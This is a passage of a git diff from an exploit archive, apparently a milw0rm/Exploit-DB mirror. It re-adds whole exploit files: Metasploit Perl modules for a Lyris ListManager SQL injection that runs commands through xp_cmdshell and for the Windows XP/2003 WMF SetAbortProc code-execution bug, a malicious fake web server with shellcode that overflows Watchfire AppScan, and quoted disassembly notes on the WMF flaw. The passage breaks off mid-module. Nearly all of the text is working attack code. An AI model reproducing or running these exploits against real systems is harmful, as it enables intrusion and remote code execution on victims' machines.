en-us,en;q=0.5". "\r\n". + "Accept-Encoding: gzip,deflate". "\r\n". + "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n". + "Keep-Alive: 300". "\r\n". + "Connection: keep-alive". "\r\n". + "Authorization: Basic ". Pex::Text::Base64Encode($splat, ''). + "\r\n\r\n"; + + $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1])); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError);
+ return;
+ }
+
+ $s->Send($sploit);
+ $self->Handler($s);
+ $s->Close();
+ return;
+}
+
+1;
+
+
+# milw0rm.com [2005-12-08]
diff --git a/platforms/windows/remote/1366.pm b/platforms/windows/remote/1366.pm
index 0d1449822..085c09c9f 100755
--- a/platforms/windows/remote/1366.pm
+++ b/platforms/windows/remote/1366.pm
@@ -1,178 +1,177 @@ - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::lyris_attachment_mssql; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Lyris ListManager Attachment SQL Injection (MSSQL)', - 'Version' => '$Revision: 1.2 $', - 'Authors' => [ 'H D Moore ', ], - 'Arch' => [ ], - 'OS' => [ 'win32' ], - 'Priv' => 1, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 80], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Payload' => - { - 'Space' => 1000, - 'Keys' => ['cmd'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a SQL injection flaw in the Lyris ListManager - software for Microsoft SQL Server. This flaw allows for arbitrary commands - to be executed with administrative privileges by calling the xp_cmdshell - stored procedure. Additionally, a window of opportunity is opened during the - ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall' - for a 5-10 minute period. After the installer finishes, the password is - permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number). 
-}), - - 'Refs' => - [ - ['URL', 'http://metasploit.com/research/vulns/lyris_listmanager/'], - ['OSVDB', '21548'], - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - ['No target needed.'], - ], - - 'Keys' => ['lyris'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - - $s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n"); - - my $r = $s->Recv(-1, 5); - - if ($r =~ /Unclosed quotation mark before/) { - $self->PrintLine("[*] Vulnerable installation detected ;)"); - return $self->CheckCode('Detected'); - } - - if ($r =~ /SQL error reported from Lyris/) { - $self->PrintLine("[*] Vulnerable installation, but not running MSSQL."); - return $self->CheckCode('Safe'); - } - - if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) { - $self->PrintLine("[*] This system appears to be patched"); - return $self->CheckCode('Safe'); - } - - $self->PrintLine("[*] Unknown response, patched or invalid target."); - return $self->CheckCode('Safe'); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - - my $cmd = $self->GetVar('EncodedPayload')->RawPayload; - - my $sql = - 'DECLARE @X NVARCHAR(4000);'. 
- 'SET @X= '; - - foreach my $c (unpack('C*', $cmd)) { - $sql .= "CHAR($c) + "; - } - $sql .= "'\x20';"; - $sql .= 'EXEC MASTER..XP_CMDSHELL @X'; - - my $url = "/read/attachment/1;".$self->URLEncode($sql).";--"; - - - my $request = - "GET $url HTTP/1.1\r\n". - "Host: $target_host:$target_port\r\n\r\n"; - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - 'SSL' => $self->GetVar('SSL'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host."); - $s->Send($request); - - $self->PrintLine("[*] Waiting for a response..."); - $s->Recv(-1, 10); - $self->Handler($s); - $s->Close(); - return; -} - -sub URLEncode { - my $self = shift; - my $data = shift; - my $res; - - foreach my $c (unpack('C*', $data)) { - if ( - ($c >= 0x30 && $c <= 0x39) || - ($c >= 0x41 && $c <= 0x5A) || - ($c >= 0x61 && $c <= 0x7A) - ) { - $res .= chr($c); - } else { - $res .= sprintf("%%%.2x", $c); - } - } - return $res; -} - -1; - - -# milw0rm.com [2005-12-09] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. 
+## + +package Msf::Exploit::lyris_attachment_mssql; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'Lyris ListManager Attachment SQL Injection (MSSQL)', + 'Version' => '$Revision: 1.2 $', + 'Authors' => [ 'H D Moore ', ], + 'Arch' => [ ], + 'OS' => [ 'win32' ], + 'Priv' => 1, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 80], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Payload' => + { + 'Space' => 1000, + 'Keys' => ['cmd'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a SQL injection flaw in the Lyris ListManager + software for Microsoft SQL Server. This flaw allows for arbitrary commands + to be executed with administrative privileges by calling the xp_cmdshell + stored procedure. Additionally, a window of opportunity is opened during the + ListManager for MSDE install process; the 'sa' account is set to the password 'lminstall' + for a 5-10 minute period. After the installer finishes, the password is + permanently set to 'lyris' followed by the process ID of the installer (a 1-5 digit number). +}), + + 'Refs' => + [ + ['URL', 'http://metasploit.com/research/vulns/lyris_listmanager/'], + ['OSVDB', '21548'], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + ['No target needed.'], + ], + + 'Keys' => ['lyris'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); + return $self->CheckCode('Connect'); + } + + $s->Send("GET /read/attachment/' HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n"); + + my $r = $s->Recv(-1, 5); + + if ($r =~ /Unclosed quotation mark before/) { + $self->PrintLine("[*] Vulnerable installation detected ;)"); + return $self->CheckCode('Detected'); + } + + if ($r =~ /SQL error reported from Lyris/) { + $self->PrintLine("[*] Vulnerable installation, but not running MSSQL."); + return $self->CheckCode('Safe'); + } + + if ($r =~ /ListManagerWeb.*Content-Length: 0/sm) { + $self->PrintLine("[*] This system appears to be patched"); + return $self->CheckCode('Safe'); + } + + $self->PrintLine("[*] Unknown response, patched or invalid target."); + return $self->CheckCode('Safe'); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + + my $cmd = $self->GetVar('EncodedPayload')->RawPayload; + + my $sql = + 'DECLARE @X NVARCHAR(4000);'. + 'SET @X= '; + + foreach my $c (unpack('C*', $cmd)) { + $sql .= "CHAR($c) + "; + } + $sql .= "'\x20';"; + $sql .= 'EXEC MASTER..XP_CMDSHELL @X'; + + my $url = "/read/attachment/1;".$self->URLEncode($sql).";--"; + + + my $request = + "GET $url HTTP/1.1\r\n". + "Host: $target_host:$target_port\r\n\r\n"; + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + 'SSL' => $self->GetVar('SSL'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Sending " .length($request) . 
" bytes to remote host."); + $s->Send($request); + + $self->PrintLine("[*] Waiting for a response..."); + $s->Recv(-1, 10); + $self->Handler($s); + $s->Close(); + return; +} + +sub URLEncode { + my $self = shift; + my $data = shift; + my $res; + + foreach my $c (unpack('C*', $data)) { + if ( + ($c >= 0x30 && $c <= 0x39) || + ($c >= 0x41 && $c <= 0x5A) || + ($c >= 0x61 && $c <= 0x7A) + ) { + $res .= chr($c); + } else { + $res .= sprintf("%%%.2x", $c); + } + } + return $res; +} + +1; + + +# milw0rm.com [2005-12-09] diff --git a/platforms/windows/remote/1374.pl b/platforms/windows/remote/1374.pl index 46330c376..029a73d71 100755 --- a/platforms/windows/remote/1374.pl +++ b/platforms/windows/remote/1374.pl @@ -1,58 +1,58 @@ -# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC -# -# How to use: -# 1. Run this script to setup the fake web server. -# 2. Scan the server with AppScan QA, either in Interactive or Manual mode. -# 3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly. -# -# PoC developed for Windows 2000 Server SP4. -# - -#!/usr/bin/perl -w - -use IO::Socket::INET; - -# Dissable buffering -$| = 1; - -# Define 200 OK Responses -my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\nadmin"; - -# Define the 401 Auth Required Header and Tail -my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\""; - -my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n401 Authorization Required\r\n\r\n

    Authorization Required

    \r\n

    This server could not verify that you\r\nare authorized to access the document\r\nrequested. Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.

    \r\n"; - -# Ret - call ebx - in user32.dll (Windows 2000 Server SP4) -my $ret = pack("l", 0x77e11627); - -my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x6c\x65\x21\x4e"; - -my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail; - -# Initialization of Fake WebServer -my $srv = IO::Socket::INET->new(LocalPort => 80, - Reuse => 1, - Listen => 1 ) || die "Could not create socket: $!\n"; - -print "Waiting for connections...\n"; - -while ($cli = $srv->accept()) { - printf "Request from %s\n", $cli->peerhost; - while (<$cli>) { - if (s/(admin)/$1/) { - # If Request is for "admin", launch the exploit - printf "Request for protected resource detected...launching exploit\n"; - print $cli $resExploit; - } - else { - # Else send a normal response - print $cli $res200; - } - } - close($cli); -} -close($srv); - - -# milw0rm.com [2005-12-15] +# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC +# +# How to use: +# 1. Run this script to setup the fake web server. +# 2. Scan the server with AppScan QA, either in Interactive or Manual mode. +# 3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly. +# +# PoC developed for Windows 2000 Server SP4. 
+# + +#!/usr/bin/perl -w + +use IO::Socket::INET; + +# Dissable buffering +$| = 1; + +# Define 200 OK Responses +my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=ISO-8859-1\r\n\r\nadmin"; + +# Define the 401 Auth Required Header and Tail +my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\nServer: Apache\r\nWWW-Authenticate: Basic realm=\""; + +my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n401 Authorization Required\r\n\r\n

    Authorization Required

    \r\n

    This server could not verify that you\r\nare authorized to access the document\r\nrequested. Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\nthe credentials required.

    \r\n"; + +# Ret - call ebx - in user32.dll (Windows 2000 Server SP4) +my $ret = pack("l", 0x77e11627); + +my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72\x61\x62\x6c\x65\x21\x4e"; + +my $resExploit = $res401Head . "\x41"x347 . "\xeb\x06AA". $ret . $scode . "\"\r\n" . $res401Tail; + +# Initialization of Fake WebServer +my $srv = IO::Socket::INET->new(LocalPort => 80, + Reuse => 1, + Listen => 1 ) || die "Could not create socket: $!\n"; + +print "Waiting for connections...\n"; + +while ($cli = $srv->accept()) { + printf "Request from %s\n", $cli->peerhost; + while (<$cli>) { + if (s/(admin)/$1/) { + # If Request is for "admin", launch the exploit + printf "Request for protected resource detected...launching exploit\n"; + print $cli $resExploit; + } + else { + # Else send a normal response + print $cli $res200; + } + } + close($cli); +} +close($srv); + + +# milw0rm.com [2005-12-15] diff --git a/platforms/windows/remote/1391.pm b/platforms/windows/remote/1391.pm index 8e493b9d2..f6a47f663 100755 --- a/platforms/windows/remote/1391.pm +++ b/platforms/windows/remote/1391.pm 
@@ -1,349 +1,348 @@ - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::ie_xp_pfv_metafile; - -use strict; -use base "Msf::Exploit"; -use Pex::Text; -use IO::Socket::INET; - -my $advanced = - { - }; - -my $info = - { - 'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution', - 'Version' => '$Revision: 1.8 $', - 'Authors' => - [ - 'H D Moore ', - 'O600KO78RUS[at]unknown.ru' - ], - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a vulnerability in the GDI library included with - Windows XP and 2003. This vulnerability uses the 'Escape' metafile function - to execute arbitrary code through the SetAbortProc procedure. This module - generates a random WMF record stream for each request. 
-}), - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winxp', 'win2003' ], - 'Priv' => 0, - - 'UserOpts' => - { - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - }, - - 'Payload' => - { - 'Space' => 1000 + int(rand(256)) * 4, - 'BadChars' => "\x00", - 'Keys' => ['-bind'], - }, - 'Refs' => - [ - ['BID', '16074'], - ['CVE', '2005-4560'], - ['OSVDB', '21987'], - ['MIL', '111'], - ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'], - ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'], - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - [ 'Automatic - Windows XP / Windows 2003' ] - ], - - 'Keys' => [ 'wmf' ], - - 'DisclosureDate' => 'Dec 27 2005', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - my $server = IO::Socket::INET->new( - LocalHost => $self->GetVar('HTTPHOST'), - LocalPort => $self->GetVar('HTTPPORT'), - ReuseAddr => 1, - Listen => 1, - Proto => 'tcp' - ); - my $client; - - # Did the listener create fail? - if (not defined($server)) { - $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); - return; - } - - my $httphost = $self->GetVar('HTTPHOST'); - if ($httphost eq '0.0.0.0') { - $httphost = Pex::Utils::SourceIP('1.2.3.4'); - } - - $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/"); - - while (defined($client = $server->accept())) { - $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); - } - - return; -} - -sub HandleHttpClient -{ - my $self = shift; - my $fd = shift; - - # Set the remote host information - my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); - - - # Read the HTTP command - my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10); - - - if ($url !~ /\.wmf/i) { - $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting..."); - - # XXX This could be replaced by obfuscated javascript too... - - # Transmit the HTTP redirect response - $fd->Send( - "HTTP/1.0 302 Moved\r\n" . - "Location: /". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".wmf\r\n" . - "Content-Type: text/html\r\n" . - "Content-Length: 0\r\n" . - "Connection: close\r\n" . - "\r\n" - ); - - $fd->Close(); - - return; - } - - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - - # Push our minimum length just over the ethernet MTU - my $pre_mlen = 1440 + rand(8192); - my $suf_mlen = rand(8192)+128; - - # The number of random objects we generated - my $fill = 0; - - # The buffer of random bogus objects - my $pre_buff = ""; - my $suf_buff = ""; - - while (length($pre_buff) < $pre_mlen && $fill < 65535) { - $pre_buff .= RandomWMFRecord(); - $fill += 1; - } - - while (length($suf_buff) < $suf_mlen && $fill < 65535) { - $suf_buff .= RandomWMFRecord(); - $fill += 1; - } - - my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff); - my $content = - # - # WindowsMetaHeader - # - pack('vvvVvVv', - # WORD FileType; /* Type of metafile (0=memory, 1=disk, 2=fjear) */ - 2, - # WORD HeaderSize; /* Size of header in WORDS (always 9) */ - 9, - # WORD Version; /* Version of Microsoft Windows used */ - 0x0300, - # DWORD FileSize; /* Total size of the metafile in WORDs */ - $clen/2, - # WORD NumOfObjects; /* Number of objects in the file */ - $fill+1, - # DWORD MaxRecordSize; /* The size 
of largest record in WORDs */ - int(rand(64)+8), - # WORD NumOfParams; /* Not Used (always 0) */ - 0 - ). - # - # Filler data - # - $pre_buff. - # - # StandardMetaRecord - Escape() - # - pack('Vvv', - # DWORD Size; /* Total size of the record in WORDs */ - 4, - # WORD Function; /* Function number (defined in WINDOWS.H) */ - 0x0026, # Can also be 0xff26, 0x0626, etc... - # WORD Parameters[]; /* Parameter values passed to function */ - 9, - ). $shellcode . - # - # Filler data - # - $suf_buff. - # - # Complete the structure - # - pack('Vv', - 3, - 0 - ); - - - $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload..."); - - - # Transmit the HTTP response - my $req = - "HTTP/1.0 200 OK\r\n" . - "Content-Type: text/plain\r\n" . - "Content-Length: " . length($content) . "\r\n" . - "Connection: close\r\n" . - "\r\n" . - $content; - - - my $res = $fd->Send($req); - - # Prevents IE from throwing an error in some cases - select(undef, undef, undef, 0.1); - - $fd->Close(); - - # The Content-Disposition trick was not very reliable (2003 ignores it) - # "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n". -} - - -sub RandomWMFRecord { - my $type = int(rand(3)); - - if ($type == 0) { - # CreatePenIndirect - return pack('Vv', - 8, - 0x02FA - ). Pex::Text::RandomData(10) - } - elsif ( $type == 1 ) { - # CreateBrushIndirect - return pack('Vv', - 7, - 0x02FC - ). Pex::Text::RandomData(8) - } - else { - # Rectangle - return pack('Vv', - 7, - 0x041B - ). Pex::Text::RandomData(8) - } -} - - -1; - -__END__ - -Used with permission by san[at]xfocus.org: ------------------------------------------- - -The recent wmf vul is really fun, I found some interest things after -analysed it. I attached a very simple wmf file(64 bytes) which can crash -your explorer. You can simply change those 0xcc to your shellcode. 
- -An attach wmf file constructs with a 18 bytes metafile header which -defined as following: - -typedef struct _WindowsMetaHeader -{ - WORD FileType; /* Type of metafile (0=memory, 1=disk) */ - WORD HeaderSize; /* Size of header in WORDS (always 9) */ - WORD Version; /* Version of Microsoft Windows used */ - DWORD FileSize; /* Total size of the metafile in WORDs */ - WORD NumOfObjects; /* Number of objects in the file */ - DWORD MaxRecordSize; /* The size of largest record in WORDs */ - WORD NumOfParams; /* Not Used (always 0) */ -} WMFHEAD; - -and two data records which defined as following: - -typedef struct _StandardMetaRecord -{ - DWORD Size; /* Total size of the record in WORDs */ - WORD Function; /* Function number (defined in WINDOWS.H) */ - WORD Parameters[]; /* Parameter values passed to function */ -} WMFRECORD; - -Somethings that we need to attention: - -1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2; -2. the attack file is larger than 64 bytes; -3. the last record always has a function number of 0000h, a Size of -00000003h, and no Parameters array; -4. the attack record has a function number of 0626h, which defined in -wingdi.h. 26h is important, it will flow to Escape function. I found -it will lead to SetAbortProc only the Parameters[0] is 0009h. - -.text:77C4B65C loc_77C4B65C: ; CODE XREF: PlayMetaFileRecord+43j -.text:77C4B65C ; DATA XREF: .text:off_77C769FE+o -.text:77C4B65C push [ebp+uFlags] ; case 0x26 -.text:77C4B65F push ebx -.text:77C4B660 call sub_77C4B68A -.text:77C4B665 cmp eax, edi -.text:77C4B667 mov [ebp+var_4], eax -.text:77C4B66A jnz loc_77C4B424 -.text:77C4B670 mov ax, [ebx+6] -.text:77C4B674 cmp ax, 0Fh -.text:77C4B678 jnz loc_77C5FC0A ; flow to Escape -... -.text:77C61062 loc_77C61062: ; CODE XREF: Escape+ECB7j -.text:77C61062 sub edi, 6 -.text:77C61065 jz short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h -... 
-.text:77C543E7 loc_77C543E7: ; CODE XREF: SetAbortProc+54j -.text:77C543E7 ; SetAbortProc+10720tj -.text:77C543E7 xor eax, eax -.text:77C543E9 mov [esi+14h], edi ; write callback pointer? -... -.text:77C604C8 owned: ; CODE XREF: sub_77C4B09C+1E4j -.text:77C604C8 mov eax, [eax+14h] ; the pointer -.text:77C604CB cmp eax, ecx -.text:77C604CD jz loc_77C4B286 -.text:77C604D3 push ecx -.text:77C604D4 push edi -.text:77C604D5 call eax ; got it - -Best Regards --- -san - -# milw0rm.com [2005-12-27] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::ie_xp_pfv_metafile; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket::INET; + +my $advanced = + { + }; + +my $info = + { + 'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution', + 'Version' => '$Revision: 1.8 $', + 'Authors' => + [ + 'H D Moore ', + 'O600KO78RUS[at]unknown.ru' + ], + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a vulnerability in the GDI library included with + Windows XP and 2003. This vulnerability uses the 'Escape' metafile function + to execute arbitrary code through the SetAbortProc procedure. This module + generates a random WMF record stream for each request. 
+}), + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winxp', 'win2003' ], + 'Priv' => 0, + + 'UserOpts' => + { + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + }, + + 'Payload' => + { + 'Space' => 1000 + int(rand(256)) * 4, + 'BadChars' => "\x00", + 'Keys' => ['-bind'], + }, + 'Refs' => + [ + ['BID', '16074'], + ['CVE', '2005-4560'], + ['OSVDB', '21987'], + ['MIL', '111'], + ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'], + ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ 'Automatic - Windows XP / Windows 2003' ] + ], + + 'Keys' => [ 'wmf' ], + + 'DisclosureDate' => 'Dec 27 2005', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + my $server = IO::Socket::INET->new( + LocalHost => $self->GetVar('HTTPHOST'), + LocalPort => $self->GetVar('HTTPPORT'), + ReuseAddr => 1, + Listen => 1, + Proto => 'tcp' + ); + my $client; + + # Did the listener create fail? + if (not defined($server)) { + $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); + return; + } + + my $httphost = $self->GetVar('HTTPHOST'); + if ($httphost eq '0.0.0.0') { + $httphost = Pex::Utils::SourceIP('1.2.3.4'); + } + + $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/"); + + while (defined($client = $server->accept())) { + $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); + } + + return; +} + +sub HandleHttpClient +{ + my $self = shift; + my $fd = shift; + + # Set the remote host information + my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); + + + # Read the HTTP command + my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10); + + + if ($url !~ /\.wmf/i) { + $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting..."); + + # XXX This could be replaced by obfuscated javascript too... + + # Transmit the HTTP redirect response + $fd->Send( + "HTTP/1.0 302 Moved\r\n" . + "Location: /". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".wmf\r\n" . + "Content-Type: text/html\r\n" . + "Content-Length: 0\r\n" . + "Connection: close\r\n" . + "\r\n" + ); + + $fd->Close(); + + return; + } + + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + + # Push our minimum length just over the ethernet MTU + my $pre_mlen = 1440 + rand(8192); + my $suf_mlen = rand(8192)+128; + + # The number of random objects we generated + my $fill = 0; + + # The buffer of random bogus objects + my $pre_buff = ""; + my $suf_buff = ""; + + while (length($pre_buff) < $pre_mlen && $fill < 65535) { + $pre_buff .= RandomWMFRecord(); + $fill += 1; + } + + while (length($suf_buff) < $suf_mlen && $fill < 65535) { + $suf_buff .= RandomWMFRecord(); + $fill += 1; + } + + my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff); + my $content = + # + # WindowsMetaHeader + # + pack('vvvVvVv', + # WORD FileType; /* Type of metafile (0=memory, 1=disk, 2=fjear) */ + 2, + # WORD HeaderSize; /* Size of header in WORDS (always 9) */ + 9, + # WORD Version; /* Version of Microsoft Windows used */ + 0x0300, + # DWORD FileSize; /* Total size of the metafile in WORDs */ + $clen/2, + # WORD NumOfObjects; /* Number of objects in the file */ + $fill+1, + # DWORD MaxRecordSize; /* The size 
